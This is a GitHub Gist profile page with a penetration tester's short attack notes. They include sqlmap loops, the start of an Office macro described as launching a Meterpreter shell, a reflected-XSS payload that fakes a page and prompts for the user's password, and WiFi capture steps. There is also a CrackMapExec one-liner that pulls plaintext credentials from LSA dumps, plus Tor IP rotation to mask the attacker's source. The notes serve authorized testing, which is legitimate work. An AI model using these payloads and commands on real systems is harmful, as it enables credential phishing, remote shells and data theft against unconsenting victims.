Skip to content

Instantly share code, notes, and snippets.

View hoodoer's full-sized avatar
💻
Flailing arms, pounding on laptop.

Drew hoodoer

💻
Flailing arms, pounding on laptop.
154 followers · 13 following
View GitHub Profile
@hoodoer
hoodoer / SleuthQL Loop Tricks.txt
Last active February 13, 2021 20:56
SleuthQL Loop, commands to use the output from sleuthQL.
sleuthql.py -d domainname -f proxyHistory.xml
for i in ./*.txt; do sqlmap -r $i --batch; done
Forcing https/ssl:
--force-ssl
Random user agent:
--random-agent
@hoodoer
hoodoer / osxMacro.txt
Created December 10, 2019 09:49
Mac OSX MS Office Meterpreter Macro (Python and Macscript)
For putting in excel. You can ignore the worksheets part, I used that to replace values in cells to know if a user had run macros or not when they sent the spreadsheet back.
Put #MACRO LOOKUP ERROR in fields, if use runs macros it'll fix the values, refresh the screen, and pop python meterpreter shell:
Sub Auto_Open()
'#MACRO LOOK ERROR
Worksheets("Sheet1").Range("H1") = "Quick Ratio"
@hoodoer
hoodoer / basicAuthSqlmap.txt
Created December 10, 2019 09:44
SQLMap Basic Auth
sqlmap --users --keep-alive --dbms=sqlite --headers="Authorization: Basic BASICAUTHBASE64" -u http://SOMEURL.com
@hoodoer
hoodoer / betterXssBackgroundImage.txt
Last active June 2, 2021 15:24
Simple reflected XSS trick to blank page, set background image (such as an appropriate application page), and prompt user. Great on XSS on messy pages, can make it look like a login page quickly for a screenshot.
<html>
<body>
<script>
// Fake the application with a screenshot
document.body.outerHTML = '';
document.body.innerHTML = '';
document.body.style.backgroundImage = "url('http://localhost:80/background.png')";
document.body.style.backgroundRepeat = "no-repeat";
// Ask user to re-enter their password
@hoodoer
hoodoer / firewallScanningTips.txt
Created December 10, 2019 09:38
Tough Firewall Scanning tips for hard to detect services, firewalls that are generally a pain in the butt.
Hard to detect service, tweaks to nmap to help:
Slow it down with -T2 or -T1
Use masscan
Fin scans
Null scans
XMas scans
Fragment scans
Data length scan
TTL scan
@hoodoer
hoodoer / wifiAttacks.txt
Created December 10, 2019 09:37
WiFi Pineapple Attacks
airmon-ng check kill
https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/
On nano, or other wifi access point monitoring:
airmon-ng start wlan1
airodump-ng -w PacketCapture wlan1mon
(Then just do near the AP you're wanting to crack and wait for someone to connect to it.)
@hoodoer
hoodoer / debianVmwareMount.txt
Created December 10, 2019 09:35
Mount VMWare Share in Debian
/usr/bin/vmhgfs-fuse .host:/ /mnt/hgfs -o subtype=vmhgfs-fuse,allow_other
This seems to work too in fstab:
vmhgfs-fuse /mnt/hgfs fuse defaults,allow_other 0 0
@hoodoer
hoodoer / wpscanCommands.txt
Last active November 22, 2021 19:32
WPScan commands
wpscan.rb --url http://yourwebsite.com --enumerate dbe
database exports
wpscan.rb --url http://yourwebsite.com --enumerate cb
config backups
wpscan.rb --url http://yourwebsite.com --enumerate vp
vuln plugins
wpscan.rb --url http://yourwebsite.com --enumerate vt
@hoodoer
hoodoer / cmeTricks.txt
Created December 10, 2019 09:33
Crack Map Exec (CME) oneliner to parse out plaintext creds from cme --lsa
cat ~/.cme/logs/*secrets | egrep -v '(sha1|md5|DPAPI_SYSTEM|dpapi|NL\$KM|L\$|\$:aad3b435b51404eeaad3b435b51404ee)' | sort -u
@hoodoer
hoodoer / Tor ghost auto IP switching.txt
Created December 10, 2019 09:31
Tor Ghost auto IP switching with logging
So use a simple watch -n 30 torghost switch
That'll get you regular new IP addresses.
To log the IP addresses isn't as clean, do this (make sure you proxy through burp, and have Burp configured to use Tor proxy)
watch -n 15 -t curl --proxy http://127.0.0.1:8080 -s ipinfo.io/ip >> torSourceIPs.txt
Due to weird formatting, you'll often not actually see those IP addresses if you cat the file, but they're there if you open it in sublime or something.
You can grep them out cleanly with this: